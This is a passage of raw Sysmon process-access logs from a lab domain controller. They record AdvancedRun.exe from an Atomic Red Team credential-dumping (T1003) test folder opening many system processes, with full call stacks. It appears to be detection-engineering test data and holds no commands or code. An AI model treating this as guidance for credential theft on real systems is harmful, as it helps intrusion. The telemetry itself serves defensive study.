exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967384Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967383Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967382Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967381Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967379Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967378Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967377Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967376Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967375Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967374Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003967373Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967372Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003967371Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967370Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003967369Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003967368Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003967367Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 